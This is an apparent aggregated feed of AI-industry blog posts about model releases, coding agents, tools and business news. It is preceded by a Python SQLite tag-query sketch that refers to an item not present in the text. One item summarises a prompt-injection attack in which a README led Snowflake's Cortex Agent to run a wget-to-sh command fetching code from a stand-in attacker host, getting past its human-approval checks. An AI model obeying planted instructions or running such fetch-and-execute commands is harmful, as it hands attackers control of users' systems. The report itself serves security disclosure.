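To make the comparison in the SQLite tags benchmark item above concrete, here is a minimal sketch of two of the strategies it names: a many-to-many tag table and a LIKE query over a delimited text column. The schema, table names, and sample rows are hypothetical and are not taken from the benchmark itself; it only illustrates the shape of each query, not their relative speed.

```python
import sqlite3


def build_db():
    """Create an in-memory database storing tags two ways (hypothetical schema)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT, tags_text TEXT);
        CREATE TABLE tags (id INTEGER PRIMARY KEY, name TEXT UNIQUE);
        CREATE TABLE post_tags (
            post_id INTEGER REFERENCES posts(id),
            tag_id INTEGER REFERENCES tags(id),
            PRIMARY KEY (post_id, tag_id)
        );
    """)
    sample = {
        "Intro to SQLite": ["sqlite", "sql"],
        "JSON tips": ["json", "sqlite"],
        "Misc": ["notes"],
    }
    for title, tags in sample.items():
        # Delimited copy for the LIKE strategy, e.g. ",sqlite,sql,"
        tags_text = "," + ",".join(tags) + ","
        cur = db.execute(
            "INSERT INTO posts (title, tags_text) VALUES (?, ?)", (title, tags_text)
        )
        post_id = cur.lastrowid
        for tag in tags:
            db.execute("INSERT OR IGNORE INTO tags (name) VALUES (?)", (tag,))
            tag_id = db.execute(
                "SELECT id FROM tags WHERE name = ?", (tag,)
            ).fetchone()[0]
            db.execute("INSERT INTO post_tags VALUES (?, ?)", (post_id, tag_id))
    return db


def by_join(db, tag):
    """Many-to-many strategy: join through the post_tags table."""
    sql = """
        SELECT posts.title FROM posts
        JOIN post_tags ON post_tags.post_id = posts.id
        JOIN tags ON tags.id = post_tags.tag_id
        WHERE tags.name = ?
        ORDER BY posts.title
    """
    return [row[0] for row in db.execute(sql, (tag,))]


def by_like(db, tag):
    """LIKE strategy: scan the delimited text column for ',tag,'."""
    sql = "SELECT title FROM posts WHERE tags_text LIKE ? ORDER BY title"
    return [row[0] for row in db.execute(sql, (f"%,{tag},%",))]
```

Wrapping each stored tag in commas is one way to stop a search for `sql` from also matching `sqlite`; the join version needs no such trick because tag names are compared exactly.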

[AINews] Gemma 4: The best small Multimodal Open Models, dramatically better than Gemma 3 in every way

A welcome update from Google!

Latent Space (swyx)blog

datasette-llm 0.1a2

Release: datasette-llm 0.1a2 actor is now available to the llm_prompt_context plugin hook. #2 Tags: llm, datasette

Simon Willisonblog

The Zig project's rationale for their firm anti-AI contribution policy

Zig has one of the most stringent anti-LLM policies of any major open source project: No LLMs for issues. No LLMs for pull requests. No LLMs for comments on the bug tracker, including translation. English is encouraged, but not required. You are welcome to post in your native language and rely on others to have their own translation tools of choice to interpret your words. The most prominent project written in Zig may be the Bun JavaScript runtime, which was acquired by Anthropic in December 2

Simon Willisonblog

llm 0.32a1

Release: llm 0.32a1 Fixed a bug in 0.32a0 where tool-calling conversations were not correctly reinflated from SQLite. #1426 Tags: llm

Simon Willisonblog

datasette-files-s3 0.1a1

Release: datasette-files-s3 0.1a1 A backend for datasette-files that adds the ability to store and retrieve files using an S3 bucket. This release added a mechanism for fetching S3 configuration periodically from a URL, which means we can use time limited IAM credentials that are restricted to a prefix within a bucket. Tags: s3, datasette

Simon Willisonblog

Coding agents for data analysis

Here's the handout I prepared for my NICAR 2026 workshop "Coding agents for data analysis" - a three hour session aimed at data journalists demonstrating ways that tools like Claude Code and OpenAI Codex can be used to explore, analyze and clean data. Here's the table of contents: Coding agents Warmup: ChatGPT and Claude Setup Claude Code and Codex Asking questions against a database Exploring data with agents Cleaning data: decoding neighborhood codes Creating

Simon Willisonblog

We Rewrote JSONata with AI in a Day, Saved $500K/Year

Bit of a hyperbolic framing but this looks like another case study of vibe porting, this time spinning up a new custom Go implementation of the JSONata JSON expression language - similar in focus to jq, and heavily associated with the Node-RED platform. As with other vibe-porting projects the key enabling factor was JSONata's existing test suite, which helped build the first working Go version in 7 hours and $400 of token spend. The Reco team

Simon Willisonblog

LLM 0.32a0 is a major backwards-compatible refactor

I just released LLM 0.32a0, an alpha release of my LLM Python library and CLI tool for accessing LLMs, with some consequential changes that I've been working towards for quite a while. Previous versions of LLM modeled the world in terms of prompts and responses. Send the model a text prompt, get back a text response. import llm model = llm.get_model("gpt-5.5") response = model.prompt("Capital of France?") print(response.text()) This made sense when I started working on the library back in April

Simon Willisonblog

llm 0.32a0

Release: llm 0.32a0 See the annotated release notes. Tags: llm

Simon Willisonblog

Thoughts on OpenAI acquiring Astral and uv/ruff/ty

The big news this morning: Astral to join OpenAI (on the Astral blog) and OpenAI to acquire Astral (the OpenAI announcement). Astral are the company behind uv, ruff, and ty - three increasingly load-bearing open source projects in the Python ecosystem. I have thoughts! The official line from OpenAI and Astral The Astral team will become part of the Codex team at OpenAI. Charlie Marsh has this to say: Open source is at the heart of that impact and the heart of that story; it sits at the center o

Simon Willisonblog

vLLM V0 to V1: Correctness Before Corrections in RL

Hugging Face Blogblog

How coding agents work

Agentic Engineering Patterns > As with any tool, understanding how coding agents work under the hood can help you make better decisions about how to apply them. A coding agent is a piece of software that acts as a harness for an LLM, extending that LLM with additional capabilities that are powered by invisible prompts and implemented as callable tools. Large Language Models At the heart of any coding agent is a Large Language Model, or LLM. These have names like GPT-5.4 or Claude Opus 4.6

Simon Willisonblog

John M. Mossman Lock Collection

Museum: John M. Mossman Lock Collection The General Society of Mechanics and Tradesmen of the City of New York is home to the John M. Mossman Lock Collection, likely the world's largest collection of antique bank locks. Tags: museums

Simon Willisonblog

What is agentic engineering?

Agentic Engineering Patterns > I use the term agentic engineering to describe the practice of developing software with the assistance of coding agents. What are coding agents? They're agents that can both write and execute code. Popular examples include Claude Code, OpenAI Codex, and Gemini CLI. What's an agent? Clearly defining that term is a challenge that has frustrated AI researchers since at least the 1990s but the definition I've come to accept, at least in the field of Large Langua

Simon Willisonblog

Use subagents and custom agents in Codex

Subagents were announced in general availability today for OpenAI Codex, after several weeks of preview behind a feature flag. They're very similar to the Claude Code implementation, with default subagents for "explorer", "worker" and "default". It's unclear to me what the difference between "worker" and "default" is but based on their CSV example I think "worker" is intended for running large numbers of small tasks in parallel. Codex also lets you define

Simon Willisonblog

Quoting A member of Anthropic’s alignment-science team

The point of the blackmail exercise was to have something to describe to policymakers—results that are visceral enough to land with people, and make misalignment risk actually salient in practice for people who had never thought about it before. — A member of Anthropic’s alignment-science team, as told to Gideon Lewis-Kraus Tags: ai-ethics, anthropic, claude, generative-ai, ai, llms

Simon Willisonblog

Quoting Guilherme Rambo

Tidbit: the software-based camera indicator light in the MacBook Neo runs in the secure exclave¹ part of the chip, so it is almost as secure as the hardware indicator light. What that means in practice is that even a kernel-level exploit would not be able to turn on the camera without the light appearing on screen. It runs in a privileged environment separate from the kernel and blits the light directly onto the screen hardware. — Guilherme Rambo, in a text message to John Gruber Tags

Simon Willisonblog

Moonlake: Causal World Models should be Multimodal, Interactive, and Efficient — with Chris Manning and Fan-yun Sun

We cap out our World Models coverage with one of the most exciting new approaches - long running, multiplayer, interactive world models built with agents bootstrapped from game engines!

Latent Space (swyx)blog

llm 0.29

Release: llm 0.29 Adds support for OpenAI's new models gpt-5.4, gpt-5.4-mini, and gpt-5.4-nano.

Simon Willisonblog

Snowflake Cortex AI Escapes Sandbox and Executes Malware

PromptArmor report on a prompt injection attack chain in Snowflake's Cortex Agent, now fixed. The attack started when a Cortex user asked the agent to review a GitHub repository that had a prompt injection attack hidden at the bottom of the README. The attack caused the agent to execute this code: cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot)) Cortex listed cat commands as safe to run without human approval, withou

Simon Willisonblog

Quoting Tim Schilling

If you do not understand the ticket, if you do not understand the solution, or if you do not understand the feedback on your PR, then your use of LLM is hurting Django as a whole. [...] For a reviewer, it’s demoralizing to communicate with a facade of a human. This is because contributing to open source, especially Django, is a communal endeavor. Removing your humanity from that experience makes that endeavor more difficult. If you use an LLM to contribute to Django, it needs to be as a compleme

Simon Willisonblog

Autoresearching Apple's "LLM in a Flash" to run Qwen 397B locally

Here's a fascinating piece of research by Dan Woods, who managed to get a custom version of Qwen3.5-397B-A17B running at 5.5+ tokens/second on a 48GB MacBook Pro M3 Max despite that model taking up 209GB (120GB quantized) on disk. Qwen3.5-397B-A17B is a Mixture-of-Experts (MoE) model, which means that each token only needs to run against a subset of the overall model weights. These expert weights can be streamed int

Simon Willisonblog
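
The Mixture-of-Experts point in the item above (each token runs against only a subset of the weights) can be illustrated with a generic top-k router. This is a textbook-style sketch, not Qwen's actual router and not the method used in the research described; the function name `route_token`, the logits, and `k=2` are all assumptions chosen for illustration.

```python
import math


def route_token(router_logits, k=2):
    """Pick the k highest-scoring experts for one token.

    Returns a list of (expert_index, weight) pairs where the weights are a
    softmax over just the selected experts, so they sum to 1.
    """
    # Rank expert indices by their router score, highest first.
    ranked = sorted(
        range(len(router_logits)), key=lambda i: router_logits[i], reverse=True
    )
    chosen = ranked[:k]
    # Softmax restricted to the chosen experts.
    exps = [math.exp(router_logits[i]) for i in chosen]
    total = sum(exps)
    return [(i, e / total) for i, e in zip(chosen, exps)]


# Hypothetical scores for four experts; only two are activated for this token.
selection = route_token([0.1, 2.0, -1.0, 1.0], k=2)
```

Only the experts returned by the router need their weights in memory for that token, which is the property that makes streaming expert weights from disk plausible in principle.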

datasette 1.0a26

Release: datasette 1.0a26 Datasette now has a mechanism for assigning semantic column types. Built-in column types include url, email, and json, and plugins can register additional types using the new register_column_types() plugin hook.

Simon Willisonblog

Quoting Maggie Appleton

[...] if you ever needed another reason to learn in public by digital gardening or podcasting or streaming or whathaveyou, add on that people will assume you’re more competent than you are. This will get you invites to very cool exclusive events filled with high-achieving, interesting people, even though you have no right to be there. A+ side benefit. — Maggie Appleton, Gathering Structures (via) Tags: blogging, maggie-appleton

Simon Willisonblog

OpenAI acquires TBPN

OpenAI acquires TBPN to accelerate global conversations around AI and support independent media, expanding dialogue with builders, businesses, and the broader tech community.

OpenAI Blogblog

Quoting OpenAI Codex base_instructions

Never talk about goblins, gremlins, raccoons, trolls, ogres, pigeons, or other animals or creatures unless it is absolutely and unambiguously relevant to the user's query. — OpenAI Codex base_instructions, for GPT-5.5 Tags: openai, ai, llms, system-prompts, prompt-engineering, codex-cli, generative-ai, gpt

Simon Willisonblog

Subagents

Agentic Engineering Patterns > LLMs are restricted by their context limit - how many tokens they can fit in their working memory at any given time. These values have not increased much over the past two years even as the LLMs themselves have seen dramatic improvements in their abilities - they generally top out at around 1,000,000, and benchmarks frequently report better quality results below 200,000. Carefully managing the context such that it fits within those limits is critical to gett

Simon Willisonblog

Codex now offers more flexible pricing for teams

Codex now includes pay-as-you-go pricing for ChatGPT Business and Enterprise, providing teams a more flexible option to start and scale adoption.

OpenAI Blogblog

[AINews] Silicon Valley gets Serious about Services

A series of announcements line up to a big theme: Services are the next big opportunity.

Latent Space (swyx)blog

My fireside chat about agentic engineering at the Pragmatic Summit

I was a speaker last month at the Pragmatic Summit in San Francisco, where I participated in a fireside chat session about Agentic Engineering hosted by Eric Lui from Statsig. The video is available on YouTube. Here are my highlights from the conversation. Stages of AI adoption We started by talking about the different phases a software developer goes through in adopting AI coding tools. 02:45 I feel like there are different stages of AI adoption as a programmer. You start off with you'v

Simon Willisonblog

[AINews] A quiet April Fools

a quiet day

Latent Space (swyx)blog

Introducing Mistral Small 4

Big new release from Mistral today (despite the name) - a new Apache 2 licensed 119B parameter (Mixture-of-Experts, 6B active) model which they describe like this: Mistral Small 4 is the first Mistral model to unify the capabilities of our flagship models, Magistral for reasoning, Pixtral for multimodal, and Devstral for agentic coding, into a single, versatile model. It supports reasoning_effort="none" or reasoning_effort="high", with the latter providing "equivale

Simon Willisonblog

Quoting Matthew Yglesias

Five months in, I think I've decided that I don't want to vibecode — I want professionally managed software companies to use AI coding assistance to make more/better/cheaper software products that they sell to me for money. — Matthew Yglesias Tags: agentic-engineering, vibe-coding, ai-assisted-programming, ai

Simon Willisonblog

How frontier enterprises are building an AI advantage

OpenAI’s B2B Signals research shows how frontier enterprises deepen AI adoption, scale Codex-powered agentic workflows, and build durable competitive advantage.

OpenAI Blogblog

Adding Benchmaxxer Repellant to the Open ASR Leaderboard

Hugging Face Blogblog

Introducing ChatGPT Futures: Class of 2026

Meet the ChatGPT Futures Class of 2026—26 student innovators using AI to build, research, and drive real-world impact. Discover how this generation is redefining learning, creativity, and opportunity with ChatGPT.

OpenAI Blogblog

Singular Bank helps bankers move fast with ChatGPT and Codex

Singular Bank built Singularity, an internal assistant using ChatGPT and Codex to help bankers save 60–90 minutes daily on meeting prep, portfolio analysis, and follow-up.

OpenAI Blogblog

Uber uses OpenAI to help people earn smarter and book faster

Uber uses OpenAI to power AI assistants and voice features that help drivers earn smarter and riders book faster across a global real-time marketplace.

OpenAI Blogblog

Quoting Jannis Leidel

GitHub’s slopocalypse – the flood of AI-generated spam PRs and issues – has made Jazzband’s model of open membership and shared push access untenable. Jazzband was designed for a world where the worst case was someone accidentally merging the wrong PR. In a world where only 1 in 10 AI-generated PRs meets project standards, where curl had to shut down its bug bounty because confirmation rates dropped below 5%, and where GitHub’s own response was a kill switch to disable pull requests entirely – a

Simon Willisonblog

GPT-5.4 mini and GPT-5.4 nano, which can describe 76,000 photos for $52

OpenAI today: Introducing GPT‑5.4 mini and nano. These models join GPT-5.4 which was released two weeks ago. OpenAI's self-reported benchmarks show the new 5.4-nano out-performing their previous GPT-5 mini model when run at maximum reasoning effort. The new mini is also 2x faster than the previous mini. Here's how the pricing looks - all prices are per million tokens. gpt-5.4-nano is notably even cheaper than Google's Gemini 3.1 Flash-Lite: Model Input Cached input

Simon Willisonblog
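
The headline figure in the item above (76,000 photos described for $52) works out to a small fraction of a cent per photo. A quick sketch of that arithmetic, using only the two numbers from the title; the helper name `cost_per_item` is made up for illustration.

```python
def cost_per_item(total_cost, item_count):
    """Average cost of one item given a total spend and an item count."""
    return total_cost / item_count


per_photo = cost_per_item(52, 76_000)   # dollars per photo
per_thousand = per_photo * 1000         # dollars per 1,000 photos
print(f"${per_photo:.5f} per photo, ${per_thousand:.3f} per 1,000 photos")
```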

llm-openai-via-codex 0.1a0

Release: llm-openai-via-codex 0.1a0 Hijacks your Codex CLI credentials to make API calls with LLM, as described in my post about GPT-5.5. Tags: openai, llm, codex-cli

Simon Willisonblog

🔬Doing Vibe Physics — Alex Lupsasca, OpenAI

The full story of how GPT‑5.x derived new results in theoretical physics and quantum gravity.

Latent Space (swyx)blog

Quoting Ken Jin

Great news—we’ve hit our (very modest) performance goals for the CPython JIT over a year early for macOS AArch64, and a few months early for x86_64 Linux. The 3.15 alpha JIT is about 11-12% faster on macOS AArch64 than the tail calling interpreter, and 5-6% faster than the standard interpreter on x86_64 Linux. — Ken Jin, Python 3.15’s JIT is now back on track Tags: python

Simon Willisonblog

What's new in pip 26.1 - lockfiles and dependency cooldowns!

Richard Si describes an excellent set of upgrades to Python's default pip tool for installing dependencies. This version drops support for Python 3.9 - fair enough, since it's been EOL since October. macOS still ships with python3 as a default Python 3.9, so I tried out the new Python version against Python 3.14 like this: uv python install 3.14 mkdir /tmp/experiment cd /tmp/experiment python3.14 -m venv venv source venv/bin/activ

Simon Willisonblog

Introducing talkie: a 13B vintage language model from 1930

New project from Nick Levine, David Duvenaud, and Alec Radford (of GPT, GPT-2, Whisper fame). talkie-1930-13b-base (53.1 GB) is a "13B language model trained on 260B tokens of historical pre-1931 English text". talkie-1930-13b-it (26.6 GB) is a checkpoint "finetuned using a novel dataset of instruction-response pairs extracted from pre-1931 reference works", designed to power a chat interface. You can try that out here. Both models are

Simon Willisonblog

1M context is now generally available for Opus 4.6 and Sonnet 4.6

Here's what surprised me: Standard pricing now applies across the full 1M window for both models, with no long-context premium. OpenAI and Gemini both charge more for prompts where the token count goes above a certain point - 200,000 for Gemini 3.1 Pro and 272,000 for GPT-5.4. Tags: ai, generative-ai, llms, anthropic, claude, llm-pricing, long-context

Simon Willisonblog

Quoting Craig Mod

Simply put: It’s a big mess, and no off-the-shelf accounting software does what I need. So after years of pain, I finally sat down last week and started to build my own. It took me about five days. I am now using the best piece of accounting software I’ve ever used. It’s blazing fast. Entirely local. Handles multiple currencies and pulls daily (historical) conversion rates. It’s able to ingest any CSV I throw at it and represent it in my dashboard as needed. It knows US and Japan tax requirement

Simon Willisonblog

microsoft/VibeVoice

VibeVoice is Microsoft's Whisper-style audio model for speech-to-text, MIT licensed and with speaker diarization built into the model. Microsoft released it on January 21st, 2026 but I hadn't tried it until today. Here's a one-liner to run it on a Mac with uv, mlx-audio (by Prince Canuma) and the 5.71GB mlx-community/VibeVoice-ASR-4bit MLX conversion of the 17.3GB VibeVoice-ASR model, in this case against a downloaded copy of my recent podcast appearance with Lenny Rachitsky:

Simon Willisonblog

Holo3: Breaking the Computer Use Frontier

Hugging Face Blogblog

Tracking the history of the now-deceased OpenAI Microsoft AGI clause

For many years, Microsoft and OpenAI's relationship has included a weird clause saying that, should AGI be achieved, Microsoft's commercial IP rights to OpenAI's technology would be null and void. That clause appeared to end today. I decided to try and track its expression over time on openai.com. OpenAI, July 22nd 2019 in Microsoft invests in and partners with OpenAI to support us building beneficial AGI (emphasis mine): OpenAI is producing a sequence of increasingly powerful AI technologies,

Simon Willisonblog

Speech translation in Google Meet is now rolling out to mobile devices

I just encountered this feature via a "try this out now" prompt in a Google Meet meeting. It kind-of worked! This is Google's implementation of the ultimate sci-fi translation app, where two people can talk to each other in two separate languages and Meet translates from one to the other and - with a short delay - repeats the text in your preferred language, with a rough imitation of the original speaker's voice. It can only

Simon Willisonblog

Unlocking large scale AI training networks with MRC (Multipath Reliable Connection)

OpenAI introduces MRC (Multipath Reliable Connection), a new supercomputer networking protocol released via OCP to improve resilience and performance in large-scale AI training clusters.

OpenAI Blogblog

GPT-5.5 Instant: smarter, clearer, and more personalized

GPT-5.5 Instant updates ChatGPT’s default model with smarter, more accurate answers, reduced hallucinations, and improved personalization controls.

OpenAI Blogblog

GPT-5.5 Instant System Card

OpenAI Blogblog

Shopify/liquid: Performance: 53% faster parse+render, 61% fewer allocations

PR from Shopify CEO Tobias Lütke against Liquid, Shopify's open source Ruby template engine that was somewhat inspired by Django when Tobi first created it back in 2005. Tobi found dozens of new performance micro-optimizations using a variant of autoresearch, Andrej Karpathy's new system for having a coding agent run hundreds of semi-autonomous experiments to find new effective techniques for training nanochat. Tobi's im

Simon Willisonblog

A pelican for GPT-5.5 via the semi-official Codex backdoor API

GPT-5.5 is out. It's available in OpenAI Codex and is rolling out to paid ChatGPT subscribers. I've had some preview access and found it to be a fast, effective and highly capable model. As is usually the case these days, it's hard to put into words what's good about it - I ask it to build things and it builds exactly what I ask for! There's one notable omission from today's release - the API: API deployments require different safeguards and we are working closely with partners and customers on

Simon Willisonblog

[AINews] The Claude Code Source Leak

The accidental "open sourcing" of Claude Code brings a ton of insights.

Latent Space (swyx)blog

MALUS - Clean Room as a Service

Brutal satire on the whole vibe-porting license washing thing (previously): Finally, liberation from open source license obligations. Our proprietary AI robots independently recreate any open source project from scratch. The result? Legally distinct code with corporate-friendly licensing. No attribution. No copyleft. No problems.. I admit it took me a moment to confirm that this was a joke. Just too on-the-nose. Via Hacker News Tags: open-source, ai,

Simon Willisonblog

Coding After Coders: The End of Computer Programming as We Know It

Epic piece on AI-assisted development by Clive Thompson for the New York Times Magazine, who spoke to more than 70 software developers from companies like Google, Amazon, Microsoft, Apple, plus other individuals including Anil Dash, Thomas Ptacek, Steve Yegge, and myself. I think the piece accurately and clearly captures what's going on in our industry right now in terms appropriate for a wider audience. I talked to Clive a few w

Simon Willisonblog

New ways to buy ChatGPT ads

OpenAI expands ChatGPT ads with a beta self-serve Ads Manager, CPC bidding, and enhanced measurement tools—built to protect privacy and keep conversations separate from ads.

OpenAI Blogblog

[AINews] The Other vs The Utility

a quiet day lets us reflect on the nature of AI "character" in the Clippy vs Anton debate

Latent Space (swyx)blog

Quoting Les Orchard

Here's what I think is happening: AI-assisted coding is exposing a divide among developers that was always there but maybe less visible. Before AI, both camps were doing the same thing every day. Writing code by hand. Using the same editors, the same languages, the same pull request workflows. The craft-lovers and the make-it-go people sat next to each other, shipped the same products, looked indistinguishable. The motivation behind the work was invisible because the process was identical. Now t

Simon Willisonblog

Gradient Labs gives every bank customer an AI account manager

Gradient Labs uses GPT-4.1 and GPT-5.4 mini and nano to power AI agents that automate banking support workflows with low latency and high reliability.

OpenAI Blogblog

OpenAI and PwC collaborate to reimagine the office of the CFO

OpenAI and PwC are partnering to help enterprises use AI agents to automate finance workflows, improve forecasting, strengthen controls, and modernize the CFO function.

OpenAI Blogblog

The people do not yearn for automation

This written and video essay by Nilay Patel explores why AI is unpopular with the general public even as usage numbers for ChatGPT continue to skyrocket. It’s a superb piece of commentary, and something I expect I’ll be thinking about for a long time to come. Nilay’s core idea is that people afflicted with “software brain” - who see the world as something to be automated as much as possible, and attempt to model everything in terms of information flows and

Simon Willisonblog

Serving the For You feed

One of Bluesky's most interesting features is that anyone can run their own custom "feed" implementation and make it available to other users - effectively enabling custom algorithms that can use any mechanism they like to recommend posts. spacecowboy runs the For You Feed, used by around 72,000 people. This guest post on the AT Protocol blog explains how it works. The architecture is fascinating. The feed is served by a single Go process using SQLite on a "gaming" PC in

Simon Willisonblog

WHY ARE YOU LIKE THIS

@scottjla on Twitter in reply to my pelican riding a bicycle benchmark: I feel like we need to stack these tests now I checked to confirm that the model (ChatGPT Images 2.0) added the "WHY ARE YOU LIKE THIS" sign of its own accord and it did - the prompt Scott used was: Create an image of a horse riding an astronaut, where the astronaut is riding a pelican that is riding a bicycle. It looks very chaotic but they all just manage to balance on top of each other Tags: text-to-image, pelic

Simon Willisonblog

Millisecond Converter

Tool: Millisecond Converter LLM reports prompt durations in milliseconds and I got fed up of having to think about how to convert those to seconds and minutes. Tags: tools

Simon Willisonblog
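
The conversion described in the Millisecond Converter item above is simple enough to sketch in a few lines. This is not the tool's actual code, just one way to express the same arithmetic; the function names and the output format are assumptions.

```python
def convert_ms(ms):
    """Return (seconds, minutes) for a duration given in milliseconds."""
    seconds = ms / 1000
    minutes = seconds / 60
    return seconds, minutes


def format_duration(ms):
    """Render a millisecond duration as whole minutes plus leftover seconds."""
    seconds = ms / 1000
    whole_minutes, remainder = divmod(seconds, 60)
    return f"{int(whole_minutes)}m {remainder:.1f}s"


print(convert_ms(90_000))       # (90.0, 1.5)
print(format_duration(95_500))  # 1m 35.5s
```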

It's a big one

This week's edition of my email newsletter (aka content from this blog delivered to your inbox) features 4 pelicans riding bicycles, 1 possum on an e-scooter, up to 5 raccoons with ham radios hiding in crowds, 5 blog posts, 8 links, 3 quotes and a new chapter of my Agentic Engineering Patterns guide. Tags: newsletter

Simon Willisonblog

GPT-5.5 prompting guide

Now that GPT-5.5 is available in the API, OpenAI have released a wealth of useful tips on how best to prompt the new model. Here's a neat trick they recommend for applications that might spend considerable time thinking before returning a user-visible response: Before any tool calls for a multi-step task, send a short user-visible update that acknowledges the request and states the first step. Keep it to one or two sentences. I've already noticed their Codex app doing t

Simon Willisonblog

Extract PDF text in your browser with LiteParse for the web

LlamaIndex have a most excellent open source project called LiteParse, which provides a Node.js CLI tool for extracting text from PDFs. I got a version of LiteParse working entirely in the browser, using most of the same libraries that LiteParse uses to run in Node.js. Spatial text parsing Refreshingly, LiteParse doesn't use AI models to do what it does: it's good old-fashioned PDF parsing, falling back to Tesseract OCR (or other pluggable OCR engines) for PDFs that contain images of text rather

Simon Willisonblog

russellromney/honker

"Postgres NOTIFY/LISTEN semantics" for SQLite, implemented as a Rust SQLite extension and various language bindings to help make use of it. The design of this looks very solid. It lets you write Python code for queues that looks like this: import honker db = honker.open("app.db") emails = db.queue("emails") emails.enqueue({"to": "alice@example.com"}) # Consume (in a worker process) async for job in emails.claim("worker-1"): send(job.payload) job.ack() And Kafka-sty

Simon Willisonblog

An update on recent Claude Code quality reports

It turns out the high volume of complaints that Claude Code was providing worse quality results over the past two months was grounded in real problems. The models themselves were not to blame, but three separate issues in the Claude Code harness caused complex but material problems which directly affected users. Anthropic's postmortem describes these in detail. This one in particular stood out to me: On March 26, we shipped a change to clear Claud

Simon Willisonblog

Quoting Romain Huet

Since GPT-5.4, we’ve unified Codex and the main model into a single system, so there’s no separate coding line anymore. GPT-5.5 takes this further, with strong gains in agentic coding, computer use, and any task on a computer. — Romain Huet, confirming OpenAI won't release a GPT-5.5-Codex model Tags: generative-ai, gpt, openai, ai, llms

Simon Willisonblog

llm 0.31

Release: llm 0.31 New GPT-5.5 OpenAI model: llm -m gpt-5.5. #1418 New option to set the text verbosity level for GPT-5+ OpenAI models: -o verbosity low. Values are low, medium, high. New option for setting the image detail level used for image attachments to OpenAI models: -o image_detail low - values are low, high and auto, and GPT-5.4 and 5.5 also accept original. Models listed in extra-openai-models.yaml are now also registered as asynchronous. #1395 Tags: gpt, o

Simon Willisonblog

Sorting algorithms

Today in animated explanations built using Claude: I've always been a fan of animated demonstrations of sorting algorithms so I decided to spin some up on my phone using Claude Artifacts, then added Python's timsort algorithm, then a feature to run them all at once. Here's the full sequence of prompts: Interactive animated demos of the most common sorting algorithms This gave me bubble sort, selection sort, insertion sort, merge sort, quick sort, and heap sort. Add timsort,

Simon Willisonblog

Accelerating the next phase of AI

OpenAI raises $122 billion in new funding to expand frontier AI globally, invest in next-generation compute, and meet growing demand for ChatGPT, Codex, and enterprise AI.

OpenAI Blogblog

DeepSeek V4 - almost on the frontier, a fraction of the price

Chinese AI lab DeepSeek's last model release was V3.2 (and V3.2 Speciale) last December. They just dropped the first of their hotly anticipated V4 series in the shape of two preview models, DeepSeek-V4-Pro and DeepSeek-V4-Flash. Both models are 1 million token context Mixture of Experts. Pro is 1.6T total parameters, 49B active. Flash is 284B total, 13B active. They're using the standard MIT license. I think this makes DeepSeek-V4-Pro the new largest open weights model. It's larger than Kimi K2.

Simon Willisonblog

Quoting John Carmack

It is hard for less experienced developers to appreciate how rarely architecting for future requirements / applications turns out net-positive. — John Carmack, a tweet in June 2021 Tags: john-carmack, software-engineering, yagni

Simon Willisonblog

How OpenAI delivers low-latency voice AI at scale

How OpenAI rebuilt its WebRTC stack to power real-time Voice AI with low latency, global scale, and seamless conversational turn-taking.

OpenAI Blogblog

[AINews] The Last 4 Jobs in Tech

a quiet day lets us examine an interesting mental model

Latent Space (swyx)blog

AI should help us produce better code

Many developers worry that outsourcing their code to AI tools will result in a drop in quality, producing bad code that's churned out fast enough that decision makers are willing to overlook its flaws. If adopting coding agents demonstrably reduces the quality of the code and features you are producing, you should address that problem directly: figure out which aspects of your process are hurting the quality of your output and fix them. Shipping worse code w

Simon Willisonblog

Mistral: Voxtral TTS, Forge, Leanstral, & what's next for Mistral 4 — w/ Pavan Kumar Reddy & Guillaume Lample

Mistral is one of the world's leading frontier model labs, and has just launched Voxtral TTS, their latest step in their strategy to offer open frontier intelligence for every modality.

Latent Space (swyx)blog

Production query plans without production data

Radim Marek describes the new pg_restore_relation_stats() and pg_restore_attribute_stats() functions that were introduced in PostgreSQL 18 in September 2025. The PostgreSQL query planner makes use of internal statistics to help it decide how to best execute a query. These statistics often differ between production data and development environments, which means the query plans used in production may not be replicable in development. PostgreSQL's new

Simon Willisonblog

Helping disaster response teams turn AI into action across Asia

AI for Disaster Response in Asia: OpenAI Workshop with Gates Foundation

OpenAI Blogblog

[AINews] AI Engineer World's Fair — Autoresearch, Memory, World Models, Tokenmaxxing, Agentic Commerce, and Vertical AI Call for Speakers

a quiet day lets us make a call for speakers!

Latent Space (swyx)blog

AI evals are becoming the new compute bottleneck

Hugging Face Blogblog

[AINews] Agents for Everything Else: Codex for Knowledge Work, Claude for Creative Work

a quiet day lets us reflect on coding agents "breaking containment"

Latent Space (swyx)blog

[AINews] H100 prices are melting UP

a quiet day lets us report an important GPU trend

Latent Space (swyx)blog

STADLER reshapes knowledge work at a 230-year-old company

Learn how STADLER uses ChatGPT to transform knowledge work, saving time and accelerating productivity across 650 employees.

OpenAI Blogblog

What's New in Mellea 0.4.0 + Granite Libraries Release

Hugging Face Blogblog

Step by Step Guide to Build an End-to-End Model Optimization Pipeline with NVIDIA Model Optimizer Using FastNAS Pruning and Fine-Tuning

In this tutorial, we build a complete end-to-end pipeline using NVIDIA Model Optimizer to train, prune, and fine-tune a deep learning model directly in Google Colab. We start by setting up the environment and preparing the CIFAR-10 dataset, then define a ResNet architecture and train it to establish a strong baseline. From there, we apply […]

MarkTechPostblog

Google Releases Gemini 3.1 Flash Live: A Real-Time Multimodal Voice Model for Low-Latency Audio, Video, and Tool Use for AI Agents

Google has released Gemini 3.1 Flash Live in preview for developers through the Gemini Live API in Google AI Studio. This model targets low-latency, more natural, and more reliable real-time voice interactions, serving as Google’s ‘highest-quality audio and speech model to date.’ By natively processing multimodal streams, the release provides a technical foundation for building […]

MarkTechPostblog

Anthropic wins injunction against Trump administration over Defense Department saga

A federal judge has ordered that the Trump administration rescind recent restrictions it placed on the AI company.

TechCrunch AIblog

[AINews] The Inference Inflection

a quiet day lets us reflect on the growing implications of the inference age

Latent Space (swyx)blog

Judge sides with Anthropic to temporarily block the Pentagon’s ban

After Anthropic's weeks-long standoff with the Pentagon, the company won one milestone: A judge granted Anthropic a preliminary injunction in its lawsuit, which sought to reverse its government blacklisting while the judicial process plays out. "The Department of War's records show that it designated Anthropic as a supply chain risk because of its 'hostile manner […]

The Verge AIblog

Introducing Advanced Account Security

Introducing Advanced Account Security: phishing-resistant login, stronger recovery, and enhanced protections to safeguard sensitive data and prevent account takeover.

OpenAI Blogblog

You can now transfer your chats and personal information from other chatbots directly into Gemini

Google is launching "switching tools" that, just as it sounds, will make it easier for users of other chatbots to switch to Gemini.

TechCrunch AIblog

David Sacks is no longer the White House AI and Crypto Czar

